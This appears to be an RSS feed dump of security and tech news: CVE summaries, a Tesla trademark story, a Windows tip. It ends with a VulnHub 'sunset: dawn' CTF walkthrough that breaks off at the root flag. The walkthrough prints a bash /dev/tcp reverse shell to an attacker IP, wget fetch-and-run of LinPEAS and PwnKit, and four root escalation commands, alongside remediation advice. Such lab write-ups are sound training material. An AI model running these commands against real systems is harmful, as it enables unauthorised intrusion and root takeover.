Consistent, observable performance matters more here than peak throughput.</p><p>Beyond latency, density becomes a critical concern, especially at hyperscale. In data centers where power, not cost, is the binding constraint, watts per petabyte becomes the operative metric. Floating gate NAND, the manufacturing approach at the core of Solidigm's products, is suited to that calculation. Network integration via NVMe over Fabrics, RDMA, and eventual CXL support is also essential, given the tight latency budgets of active inference pipelines.</p><p>"The drives have to have reliable performance characteristics, beyond the throughput side and being able to transfer as much data as possible as fast as possible, the way that training needed," Harthon says. "Now it's about being able to do it very consistently, in a way that's very observable to the people operating and orchestrating these systems."</p><h2>How enterprise AI leaders should plan for the context tier </h2><p>The standards, software primitives, and best practices being established now will define how AI inference infrastructure operates for years to come. Solidigm is engaged in that process through standards bodies, partner lab collaborations, and published research, which is critical precisely because the category is still forming.</p><p>"The interesting question for the next couple of years isn't whether AI infrastructure needs more compute," Harthorn says. "It's whether it can use what it has more efficiently. A lot of that answer runs through this tier that is being built today."</p><hr><p><i>Sponsored articles are content produced by a company that is either paying for the post or has a business relationship with VentureBeat, and they’re always clearly marked. For more information, contact </i><a href="mailto:sales@venturebeat.com"><i><u>sales@venturebeat.com</u></i></a><i>.</i></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-20773 | Cisco Umbrella Virtual Appliance Key-based SSH Authentication hard-coded key (cisco-sa-uva-static-key-6RQTRs4c)]]></title>
<description><![CDATA[A vulnerability classified as critical was found in Cisco Umbrella Virtual Appliance. This affects an unknown part of the component Key-based SSH Authentication Handler. Executing a manipulation can lead to use of hard-coded cryptographic key
.

This vulnerability is registered as CVE-2022-20773...]]></description>
<link>https://tsecurity.de/de/3615867/sicherheitsluecken/cve-2022-20773-cisco-umbrella-virtual-appliance-key-based-ssh-authentication-hard-coded-key-cisco-sa-uva-static-key-6rqtrs4c/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3615867/sicherheitsluecken/cve-2022-20773-cisco-umbrella-virtual-appliance-key-based-ssh-authentication-hard-coded-key-cisco-sa-uva-static-key-6rqtrs4c/</guid>
<pubDate>Mon, 22 Jun 2026 16:56:55 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">critical</a> was found in <a href="https://vuldb.com/product/cisco:umbrella_virtual_appliance">Cisco Umbrella Virtual Appliance</a>. This affects an unknown part of the component <em>Key-based SSH Authentication Handler</em>. Executing a manipulation can lead to use of hard-coded cryptographic key
.

This vulnerability is registered as <a href="https://vuldb.com/cve/CVE-2022-20773">CVE-2022-20773</a>. It is possible to launch the attack remotely. No exploit is available.

Upgrading the affected component is advised.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2017-6679 | Cisco Umbrella Virtual Appliance up to 2.0.3 SSH 7pk security (BID-101567)]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, was found in Cisco Umbrella Virtual Appliance up to 2.0.3. Affected by this vulnerability is an unknown functionality of the component SSH. The manipulation results in 7pk security features.

This vulnerability is cataloged as CVE-2017-6679. The ...]]></description>
<link>https://tsecurity.de/de/3615865/sicherheitsluecken/cve-2017-6679-cisco-umbrella-virtual-appliance-up-to-203-ssh-7pk-security-bid-101567/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3615865/sicherheitsluecken/cve-2017-6679-cisco-umbrella-virtual-appliance-up-to-203-ssh-7pk-security-bid-101567/</guid>
<pubDate>Mon, 22 Jun 2026 16:56:52 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">critical</a>, was found in <a href="https://vuldb.com/product/cisco:umbrella_virtual_appliance">Cisco Umbrella Virtual Appliance up to 2.0.3</a>. Affected by this vulnerability is an unknown functionality of the component <em>SSH</em>. The manipulation results in 7pk security features.

This vulnerability is cataloged as <a href="https://vuldb.com/cve/CVE-2017-6679">CVE-2017-6679</a>. The attack must be initiated from a local position. There is no exploit available.

You should upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-6645 | PaperCut Print Deploy up to 1.10.4177 on Windows pc-printer-updater.exe uncontrolled search path (EUVD-2026-38209)]]></title>
<description><![CDATA[A vulnerability was found in PaperCut Print Deploy up to 1.10.4177 on Windows. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file pc-printer-updater.exe. Executing a manipulation can lead to uncontrolled search path.

This vulnerability app...]]></description>
<link>https://tsecurity.de/de/3614761/sicherheitsluecken/cve-2026-6645-papercut-print-deploy-up-to-1104177-on-windows-pc-printer-updaterexe-uncontrolled-search-path-euvd-2026-38209/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3614761/sicherheitsluecken/cve-2026-6645-papercut-print-deploy-up-to-1104177-on-windows-pc-printer-updaterexe-uncontrolled-search-path-euvd-2026-38209/</guid>
<pubDate>Mon, 22 Jun 2026 09:23:39 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/papercut:print_deploy">PaperCut Print Deploy up to 1.10.4177</a> on Windows. It has been declared as <a href="https://vuldb.com/kb/risk">problematic</a>. Affected by this vulnerability is an unknown functionality of the file <em>pc-printer-updater.exe</em>. Executing a manipulation can lead to uncontrolled search path.

This vulnerability appears as <a href="https://vuldb.com/cve/CVE-2026-6645">CVE-2026-6645</a>. The attack requires local access. There is no available exploit.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[Vorschau Juli 2026: Edge Computing]]></title>
<description><![CDATA[Vorschau Juli 2026: Edge Computing

      
      
        
          
            
                



            
          
        
              
    
  Daniel Richey
Mo., 22.06.2026 - 07:00


            Hart an der Grenze: Im Juli beleuchtet IT-Administrator das "Edge Computing". Darin wer...]]></description>
<link>https://tsecurity.de/de/3614653/server/vorschau-juli-2026-edge-computing/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3614653/server/vorschau-juli-2026-edge-computing/</guid>
<pubDate>Mon, 22 Jun 2026 08:30:42 +0200</pubDate>
<category>🐧 Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<span class="field field--name-title field--type-string field--label-hidden">Vorschau Juli 2026: Edge Computing</span>

      <div class="field field--name-field-image field--type-image field--label-hidden field__items">
      <div class="images-container clearfix">
        <div class="image-preview clearfix">
          <div class="image-wrapper clearfix">
            <div class="field__item">
                <a class="image-popup overlayed" href="https://www.it-administrator.de/vorschau-juli-2026-edge-computing"><img loading="lazy" src="https://www.it-administrator.de/sites/default/files/styles/medium/public/ita202607-titel_breit.jpg?itok=PX84phYW" width="480" height="319" alt='Titelseite der Zeitschrift IT-Administrator, Ausgabe 07/26, mit dem Schwerpunktthema "Edge Computing: Rechenleistung am Netzwerkrand". Eine Illustration zeigt ein zentrales Server-Rack, das über leuchtende Datenleitungen mit mehreren kleinen Edge-Geräten und einem Laptop vernetzt ist, vor dunklem Türkis-Hintergrund.' title="Die Juli-Ausgabe des IT-Administrator rückt Edge Computing in den Mittelpunkt, von robusten Monitoring-Architekturen über Echtzeit-Linux bis zu Microsofts IoT-Appliances." typeof="foaf:Image" class="image-style-medium">

<span class="overlay"><i class="fa fa-plus"></i></span></a>

            </div>
          </div>
        </div>
              </div>
    </div>
  <span class="field field--name-uid field--type-entity-reference field--label-hidden"><a title="Benutzerprofil anzeigen." href="https://www.it-administrator.de/user/104" lang about="https://www.it-administrator.de/user/104" typeof="schema:Person" property="schema:name" datatype class="username">Daniel Richey</a></span>
<span class="field field--name-created field--type-created field--label-hidden"><time datetime="2026-06-22T07:00:00+02:00" title="Montag, Juni 22, 2026 - 07:00" class="datetime">Mo., 22.06.2026 - 07:00</time>
</span>

            <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item">Hart an der Grenze: Im Juli beleuchtet IT-Administrator das "Edge Computing". Darin werfen wir einen detaillierten Blick auf die Herausforderungen und Chancen, die das Verlegen von Rechenleistung an die Netzwerkgrenze mit sich bringt. Außerdem schauen wir uns an, wie Echtzeit-Linux im OT-Umfeld an Bedeutung gewinnt und wie der Spagat zwischen Windows-Ökosystem und dezentraler Industrie-Appliance gelingt.</div>
      <div class="field field--name-field-mt-post-categories field--type-entity-reference field--label-hidden field--entity-reference-target-type-taxonomy-term clearfix">
    <ul class="links field__items">
          <li><a href="https://www.it-administrator.de/tips-tools" hreflang="en">Tipps &amp; Tools</a></li>
      </ul>
</div>  <div class="node__links">
    <ul class="links inline"><li class="node-readmore"><a href="https://www.it-administrator.de/vorschau-juli-2026-edge-computing" rel="tag" title="Vorschau Juli 2026: Edge Computing" hreflang="en">Weiterlesen<span class="visually-hidden"> über Vorschau Juli 2026: Edge Computing</span></a></li></ul>  </div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-38220 | Quest KACE Systems Management Appliance up to 12.1 cross site scripting (EUVD-2022-40812)]]></title>
<description><![CDATA[A vulnerability described as problematic has been identified in Quest KACE Systems Management Appliance up to 12.1. Affected by this vulnerability is an unknown functionality. The manipulation results in cross site scripting.

This vulnerability is cataloged as CVE-2022-38220. The attack may be l...]]></description>
<link>https://tsecurity.de/de/3614331/sicherheitsluecken/cve-2022-38220-quest-kace-systems-management-appliance-up-to-121-cross-site-scripting-euvd-2022-40812/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3614331/sicherheitsluecken/cve-2022-38220-quest-kace-systems-management-appliance-up-to-121-cross-site-scripting-euvd-2022-40812/</guid>
<pubDate>Mon, 22 Jun 2026 03:21:11 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability described as <a href="https://vuldb.com/kb/risk">problematic</a> has been identified in <a href="https://vuldb.com/product/quest:kace_systems_management_appliance">Quest KACE Systems Management Appliance up to 12.1</a>. Affected by this vulnerability is an unknown functionality. The manipulation results in cross site scripting.

This vulnerability is cataloged as <a href="https://vuldb.com/cve/CVE-2022-38220">CVE-2022-38220</a>. The attack may be launched remotely. There is no exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[Is Tesla Planning To Sell Modular AI Data Center Hardware?]]></title>
<description><![CDATA[Electrek reports:

Tesla wants to sell modular AI data center hardware, according to a new trademark application for a product called "Megapod." The filing describes a complete, self-contained computing system for AI workloads... 

Tesla filed the "Megapod" trademark (serial number 99893717) with...]]></description>
<link>https://tsecurity.de/de/3614183/it-security-nachrichten/is-tesla-planning-to-sell-modular-ai-data-center-hardware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3614183/it-security-nachrichten/is-tesla-planning-to-sell-modular-ai-data-center-hardware/</guid>
<pubDate>Mon, 22 Jun 2026 00:07:03 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Electrek reports:

Tesla wants to sell modular AI data center hardware, according to a new trademark application for a product called "Megapod." The filing describes a complete, self-contained computing system for AI workloads... 

Tesla filed the "Megapod" trademark (serial number 99893717) with the U.S. Patent and Trademark Office this month, through its longtime IP counsel. It's an intent-to-use application, meaning Tesla is claiming the name for a product it hasn't launched yet. The goods-and-services description is unusually specific for a trademark. Megapod covers "modular data center hardware systems for artificial intelligence computing, comprised of computer servers, computer hardware for artificial intelligence data processing, networking equipment, power distribution units, and cooling systems." It also covers "self-contained modular computing hardware systems for artificial intelligence workloads," integrated platforms sold as a single unit — an enclosure bundling compute, power distribution, and cooling — and downloadable software to monitor, manage, and optimize those systems. 
In plain terms: Tesla wants to sell a turnkey AI data center building block. Not a battery, not a chip on its own, but the full rack-and-room of servers, networking, power, and cooling that AI training and inference run on.

 
Tesla's offering would have to compete with Nvidia's liquid-cooled, rack-scale systems that simulates a giant GPU, the article points out. But "The bigger issue is that Tesla has no merchant compute-hardware business to build on."


Tesla's own AI training cluster, Cortex at Gigafactory Texas, runs on roughly 67,000 Nvidia H100-equivalent GPUs. In other words, Tesla is one of Nvidia's customers, not a competitor selling alternative hardware... Where Tesla does have a real AI-data-center business is power, not compute. Its Megapack and new Megablock energy storage products are selling into AI data centers as grid buffers — Musk's own xAI has bought roughly $1 billion of Megapacks to keep its training runs powered. That energy-storage strength is the one credible thread here. A Megapod that bundles Tesla's power electronics, thermal management, and the enclosure — the "shell" around the chips rather than the chips themselves — would at least sit adjacent to a business Tesla actually runs.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Is+Tesla+Planning+To+Sell+Modular+AI+Data+Center+Hardware%3F%3A+https%3A%2F%2Fhardware.slashdot.org%2Fstory%2F26%2F06%2F21%2F2145245%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fhardware.slashdot.org%2Fstory%2F26%2F06%2F21%2F2145245%2Fis-tesla-planning-to-sell-modular-ai-data-center-hardware%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://hardware.slashdot.org/story/26/06/21/2145245/is-tesla-planning-to-sell-modular-ai-data-center-hardware?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Enable Keep printed documents in Print queue on Windows 11]]></title>
<description><![CDATA[When you print a document in Windows, it is removed from the print queue once the printing is complete. If you need to reprint the same document, you will have to follow the print document method again. To save time, you can enable the Keep printed documents option for the printer, and keep repri...]]></description>
<link>https://tsecurity.de/de/3612842/windows-tipps/enable-keep-printed-documents-in-print-queue-on-windows-11/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3612842/windows-tipps/enable-keep-printed-documents-in-print-queue-on-windows-11/</guid>
<pubDate>Sun, 21 Jun 2026 00:38:59 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="830" height="416" src="https://www.thewindowsclub.com/wp-content/uploads/2025/01/Print-Queue-Finished-Job-Reprint.png" class="attachment-full size-full wp-post-image" alt="Print Queue Finished Job Reprint" decoding="async" fetchpriority="high" srcset="https://www.thewindowsclub.com/wp-content/uploads/2025/01/Print-Queue-Finished-Job-Reprint.png 830w, https://www.thewindowsclub.com/wp-content/uploads/2025/01/Print-Queue-Finished-Job-Reprint-500x251.png 500w, https://www.thewindowsclub.com/wp-content/uploads/2025/01/Print-Queue-Finished-Job-Reprint-700x351.png 700w, https://www.thewindowsclub.com/wp-content/uploads/2025/01/Print-Queue-Finished-Job-Reprint-300x150.png 300w, https://www.thewindowsclub.com/wp-content/uploads/2025/01/Print-Queue-Finished-Job-Reprint-768x385.png 768w" sizes="(max-width: 830px) 100vw, 830px">When you print a document in Windows, it is removed from the print queue once the printing is complete. If you need to reprint the same document, you will have to follow the print document method again. To save time, you can enable the Keep printed documents option for the printer, and keep reprinting the […]</p>
<p>This article <a href="https://www.thewindowsclub.com/enable-keep-printed-documents-in-print-queue-on-windows">Enable Keep printed documents in Print queue on Windows 11</a> first appeared on <a href="https://www.thewindowsclub.com/">TheWindowsClub.com</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Oukitel WP500 Ultra review: A flagship rugged phone with a unique thermal camera — but also an inflated price]]></title>
<description><![CDATA[The Outkitel WP500 Ultra is a large, rugged phone with good camera sensors, a powerful SoC and a thermal sensor.]]></description>
<link>https://tsecurity.de/de/3610532/it-nachrichten/oukitel-wp500-ultra-review-a-flagship-rugged-phone-with-a-unique-thermal-camera-but-also-an-inflated-price/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3610532/it-nachrichten/oukitel-wp500-ultra-review-a-flagship-rugged-phone-with-a-unique-thermal-camera-but-also-an-inflated-price/</guid>
<pubDate>Fri, 19 Jun 2026 15:32:35 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The Outkitel WP500 Ultra is a large, rugged phone with good camera sensors, a powerful SoC and a thermal sensor.]]></content:encoded>
</item>
<item>
<title><![CDATA[CMA fines Marks Electrical £720k for unauthorized opt-ins]]></title>
<description><![CDATA[UK appliance retailer Marks Electrical will pay a £720,000 fine and refund nearly 40,000 customers after the Competition and Markets Authority found the company automatically enrolled buyers in paid services without their consent. This article has been indexed from CyberMaterial…
Read more →
The ...]]></description>
<link>https://tsecurity.de/de/3610507/it-security-nachrichten/cma-fines-marks-electrical-720k-for-unauthorized-opt-ins/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3610507/it-security-nachrichten/cma-fines-marks-electrical-720k-for-unauthorized-opt-ins/</guid>
<pubDate>Fri, 19 Jun 2026 15:24:18 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>UK appliance retailer Marks Electrical will pay a £720,000 fine and refund nearly 40,000 customers after the Competition and Markets Authority found the company automatically enrolled buyers in paid services without their consent. This article has been indexed from CyberMaterial…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/cma-fines-marks-electrical-720k-for-unauthorized-opt-ins/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/cma-fines-marks-electrical-720k-for-unauthorized-opt-ins/">CMA fines Marks Electrical £720k for unauthorized opt-ins</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[VulnHub — sunset: dawn | Full Walkthrough]]></title>
<description><![CDATA[Author: Shikhali Jamalzade GitHub: github.com/alisalive LinkedIn: linkedin.com/in/camalzads Platform: VulnHub Machine: sunset: dawn by @whitecr0wz Difficulty: Beginner–Intermediate | OS: Debian GNU/Linux 10 (Buster)Overviewsunset: dawn is a beginner-to-intermediate VulnHub machine and the second ...]]></description>
<link>https://tsecurity.de/de/3610158/hacking/vulnhub-sunset-dawn-full-walkthrough/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3610158/hacking/vulnhub-sunset-dawn-full-walkthrough/</guid>
<pubDate>Fri, 19 Jun 2026 13:09:29 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*DmUHvH2bRCpfgOTUO1ojqQ.png"></figure><p><strong>Author:</strong> <a href="https://medium.com/u/20557ba7487d">Shikhali Jamalzade</a> <br><strong>GitHub:</strong> <a href="http://github.com/alisalive">github.com/alisalive</a> <br><strong>LinkedIn:</strong> <a href="http://linkedin.com/in/camalzads">linkedin.com/in/camalzads</a> <br><strong>Platform:</strong> <a href="http://vulnhub.com/">VulnHub</a> <br><strong>Machine:</strong> <a href="https://www.vulnhub.com/entry/sunset-dawn,341/">sunset: dawn</a> by @whitecr0wz <br><strong>Difficulty:</strong> Beginner–Intermediate | <strong>OS:</strong> Debian GNU/Linux 10 (Buster)</p><h3>Overview</h3><p>sunset: dawn is a beginner-to-intermediate VulnHub machine and the second entry in the sunset series by @whitecr0wz. The attack path begins with SMB enumeration that reveals a writable share mapped directly to a directory executed by a root-owned cron job — uploading a reverse shell script there is enough to land a www-data shell. Post-exploitation enumeration with LinPEAS then uncovers four independent privilege escalation paths, each sufficient on its own to reach root. This machine is an excellent exercise in SMB misconfigurations, cron-based exploitation, and Linux post-exploitation methodology.</p><p><strong>Flag captured:</strong></p><ul><li>flag.txt → /root/flag.txt</li></ul><h3>Environment</h3><p>Parameter Value Target IP 192.168.100.198 Attacker IP 192.168.100.199 (Kali Linux) Test Type Black Box Hostname dawn</p><h3>Reconnaissance</h3><h3>Network Scan — Nmap</h3><p>Full-port aggressive scan to enumerate all open services:</p><pre>nmap -p- -sV -sC 192.168.100.198</pre><p><strong>Results:</strong></p><pre>PORT     STATE SERVICE     VERSION<br>80/tcp   open  http        Apache httpd 2.4.38 ((Debian))<br>139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)<br>445/tcp  open  microsoft-ds Samba smbd 4.9.5-Debian<br>3306/tcp open  mysql       MySQL 5.5.5-10.3.18-MariaDB-0+deb10u1</pre><pre>Host script results:<br>| smb-os-discovery:<br>|   OS: Windows 6.1 (Samba 4.9.5-Debian)<br>|   Computer name: dawn<br>|   NetBIOS computer name: DAWN<br>|_  Domain name: dawn</pre><p><strong>Key observations:</strong></p><ul><li><strong>Port 80</strong> — Apache 2.4.38: web server present, but browsing to it yields no useful content</li><li><strong>Port 139/445</strong> — Samba SMB: the most interesting attack surface given no web application</li><li><strong>Port 3306</strong> — MariaDB: MySQL listening, but almost certainly bound to localhost only</li></ul><p>With the web server returning nothing useful, SMB becomes the primary focus.</p><h3>Web Enumeration — Gobuster</h3><p>Even though the web server returned no meaningful content at the root, I ran a directory scan in parallel:</p><pre>gobuster dir -u http://192.168.100.198 \<br>  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \<br>  -x php,txt,html</pre><p><strong>Results:</strong></p><pre>/logs   (Status: 301)</pre><p>Browsing to /logs/ revealed a file: management.log. This log turned out to be critical — it recorded cron job activity on the system, showing automated execution of scripts inside a directory called ITDEPT:</p><pre>Executing /home/dawn/ITDEPT/product-control<br>Executing /home/dawn/ITDEPT/web-control<br>chmod +x /home/dawn/ITDEPT/product-control<br>chmod +x /home/dawn/ITDEPT/web-control<br>sh /home/dawn/ITDEPT/product-control<br>sh /home/dawn/ITDEPT/web-control</pre><p>The system was automatically making files executable and running them every minute. The name ITDEPT matched exactly what I was about to find in the SMB shares.</p><h3>SMB Enumeration — enum4linux</h3><pre>enum4linux -a 192.168.100.198</pre><p><strong>Results:</strong></p><pre>Sharename    Type    Comment<br>---------    ----    -------<br>print$       Disk    Printer Drivers<br>ITDEPT       Disk    PLEASE DO NOT REMOVE THIS SHARE.<br>                     IN CASE YOU ARE NOT AUTHORIZED TO USE<br>                     THIS SYSTEM LEAVE IMMEDIATELY.<br>IPC$         IPC     IPC Service (Samba 4.9.5-Debian)</pre><pre>[+] Users found via RID cycling:<br>    dawn<br>    ganimedes</pre><p>Two findings that matter:</p><ul><li>The ITDEPT share exists and carries a warning message — a clear sign it is actively monitored or executed</li><li>Two system users identified: <strong>dawn</strong> and <strong>ganimedes</strong></li></ul><p>I verified access permissions with smbmap:</p><pre>smbmap -H 192.168.100.198</pre><pre>ITDEPT    READ, WRITE    PLEASE DO NOT REMOVE THIS SHARE...</pre><p><strong>READ and WRITE access — no authentication required.</strong> Combined with what management.log already told me — that the system executes scripts from this exact directory every minute — the attack path was clear.</p><h3>Initial Access — SMB Write + Cron Execution → Reverse Shell</h3><p>Detail Value Vector SMB writable share + root cron job Shell obtained www-data Severity <strong>Critical</strong></p><p>The cron job runs sh /home/dawn/ITDEPT/web-control every minute. The ITDEPT SMB share maps directly to /home/dawn/ITDEPT/. Anyone who can write to the share can write to that path — and the cron will execute whatever they put there as the service account.</p><p><strong>Step 1 — Create the reverse shell script locally:</strong></p><pre>cat &gt; web-control &lt;&lt; 'EOF'<br>#!/bin/bash<br>bash -i &gt;&amp; /dev/tcp/192.168.100.199/4444 0&gt;&amp;1<br>EOF</pre><p><strong>Step 2 — Start a listener on Kali:</strong></p><pre>nc -lvnp 4444</pre><p><strong>Step 3 — Upload the script to the ITDEPT share:</strong></p><pre>smbclient //192.168.100.198/ITDEPT -N<br>smb: \&gt; put web-control<br>putting file web-control as \web-control (6.8 kb/s)<br>smb: \&gt; exit</pre><p><strong>Step 4 — Wait for the cron to fire (up to 60 seconds):</strong></p><pre>Connection received on 192.168.100.198 54321<br>www-data@dawn:/home/dawn/ITDEPT$</pre><p>Shell obtained as www-data. I stabilised it immediately:</p><pre>python3 -c 'import pty; pty.spawn("/bin/bash")'<br># Ctrl+Z<br>stty raw -echo; fg<br>export TERM=xterm</pre><h3>Post-Exploitation Enumeration — LinPEAS</h3><p>With a stable shell, I transferred LinPEAS to the target using a Python HTTP server:</p><p><strong>On Kali:</strong></p><pre>cd /usr/share/peass/linpeas<br>python3 -m http.server 80</pre><p><strong>On the target:</strong></p><pre>cd /tmp<br>wget http://192.168.100.199/linpeas.sh<br>chmod +x linpeas.sh<br>./linpeas.sh</pre><p>LinPEAS immediately flagged four high-severity findings — each one a standalone path to root.</p><h3>Privilege Escalation</h3><h3>Vector 1 — Sudo Misconfiguration</h3><p>Detail Value Finding www-data can run /usr/bin/sudo as root with no password Severity <strong>Critical</strong></p><p>LinPEAS output:</p><pre>User www-data may run the following commands on dawn:<br>    (root) NOPASSWD: /usr/bin/sudo</pre><p>This configuration allows www-data to run the sudo binary itself as root — without any password. Invoking sudo from inside sudo spawns a second privileged process that drops directly into a root shell.</p><p><strong>Exploitation:</strong></p><pre>www-data@dawn:/tmp$ sudo sudo /bin/bash<br>root@dawn:/tmp# id<br>uid=0(root) gid=0(root) groups=0(root)</pre><p>One command. Full root.</p><p><strong>Remediation:</strong></p><p>Edit /etc/sudoers and remove the www-data entry entirely. If www-data genuinely needs elevated access for a specific task, scope it to the minimum required binary — never to sudo itself:</p><pre># Remove this line:<br>www-data ALL=(root) NOPASSWD: /usr/bin/sudo</pre><h3>Vector 2 — SUID Binary (zsh)</h3><p>Detail Value Finding /usr/bin/zsh has the SUID bit set, owned by root Severity <strong>Critical</strong></p><p>LinPEAS output:</p><pre>-rwsr-xr-x 1 root root 842K Feb 4 2019 /usr/bin/zsh</pre><p>When the SUID bit is set on a binary, the process runs with the file owner’s privileges regardless of who launches it. Since zsh is a fully functional interactive shell owned by root, executing it directly spawns a root shell.</p><p><strong>Exploitation:</strong></p><pre>www-data@dawn:/tmp$ /usr/bin/zsh<br>dawn# whoami<br>root<br>dawn# id<br>uid=0(root) gid=0(root) groups=0(root)</pre><p><strong>Remediation:</strong></p><p>Remove the SUID bit from zsh immediately:</p><pre>chmod u-s /usr/bin/zsh</pre><pre># Verify:<br>ls -la /usr/bin/zsh<br>-rwxr-xr-x 1 root root 842K /usr/bin/zsh</pre><p>Interactive shells (bash, zsh, sh, dash) must never carry the SUID bit. Audit all SUID binaries regularly:</p><pre>find / -perm -4000 -type f 2&gt;/dev/null</pre><h3>Vector 3 — Writable Cron Script</h3><p>Detail Value Finding Root cron executes a script world-writable by www-data Severity <strong>High</strong></p><p>LinPEAS identified two things in combination:</p><p><strong>Finding 1 — root crontab:</strong></p><pre>* * * * * /home/dawn/ITDEPT/web-control</pre><p><strong>Finding 2 — permissions on that script:</strong></p><pre>-rwxrwxrwx 1 dawn dawn /home/dawn/ITDEPT/web-control</pre><p>The script is world-writable. Root executes it every minute. Any user who can write to this file can inject arbitrary commands that root will run.</p><p><strong>Exploitation:</strong></p><pre># Inject a SUID bash copy into the script<br>echo 'cp /bin/bash /tmp/rootbash &amp;&amp; chmod +s /tmp/rootbash' &gt;&gt; \<br>  /home/dawn/ITDEPT/web-control</pre><pre># Wait up to 60 seconds for the cron to fire, then:<br>/tmp/rootbash -p</pre><pre>rootbash-5.0# whoami<br>root<br>rootbash-5.0# id<br>uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root)</pre><p><strong>Remediation:</strong></p><pre>chmod 700 /home/dawn/ITDEPT/web-control<br>chown root:root /home/dawn/ITDEPT/web-control</pre><p>Any script executed by a root cron job must be owned by root and writable only by root. Audit cron scripts regularly:</p><pre>find /etc/cron* /var/spool/cron -type f | xargs ls -la</pre><h3>Vector 4 — PwnKit (CVE-2021–4034)</h3><p>Detail Value CVE CVE-2021–4034 CVSS 7.8 (High) Component pkexec (Polkit) Vulnerable version pkexec 0.105 Exploit source github.com/ly4k/PwnKit Severity <strong>Critical</strong></p><p>LinPEAS flagged this in its Exploit Suggester output:</p><pre>[+] [CVE-2021-4034] PwnKit<br>    Tags: [ debian=7|8|9|10|11 ]<br>    Exposure: probable</pre><p>PwnKit is a heap-based memory corruption vulnerability in pkexec — the PolicyKit binary present on virtually every Linux distribution. The flaw has existed since 2009 and was disclosed by Qualys Research Team in January 2022. It allows any unprivileged local user to escalate to root.</p><p>The pkexec binary on this system was confirmed vulnerable:</p><pre>-rwsr-xr-x 1 root root 23288 Jan 15 2019 /usr/bin/pkexec</pre><p><strong>Exploitation:</strong></p><p>On Kali, I downloaded the pre-compiled binary from ly4k/PwnKit and served it via HTTP:</p><pre>wget https://github.com/ly4k/PwnKit/raw/main/PwnKit<br>python3 -m http.server 80</pre><blockquote><strong><em>Note:</em></strong><em> The first attempt using berdav/CVE-2021–4034 failed with a </em><em>GLIBC_2.34 version mismatch. The </em><em>ly4k/PwnKit pre-compiled binary targets older GLIBC versions and is the correct choice for Debian 10.</em></blockquote><p>On the target:</p><pre>cd /tmp<br>wget http://192.168.100.199/PwnKit<br>chmod +x PwnKit<br>./PwnKit</pre><pre>root@dawn:/tmp# whoami<br>root<br>root@dawn:/tmp# id<br>uid=0(root) gid=0(root) groups=0(root),33(www-data)</pre><p><strong>Remediation:</strong></p><pre># Update polkit immediately:<br>sudo apt update &amp;&amp; sudo apt upgrade policykit-1</pre><pre># If updating is not immediately possible, remove the SUID bit as a temporary measure<br># (note: this may break some GUI authentication prompts):<br>chmod 0755 /usr/bin/pkexec</pre><p>The patched version for Debian 10 is policykit-1 0.105-26+deb10u1 or later.</p><h3>Root Flag</h3><pre>root@dawn:~# cat /root/flag.txt</pre><pre>Hello! whitecr0wz here. I hope you enjoyed this box, if you<br>did please let me know at Twitter 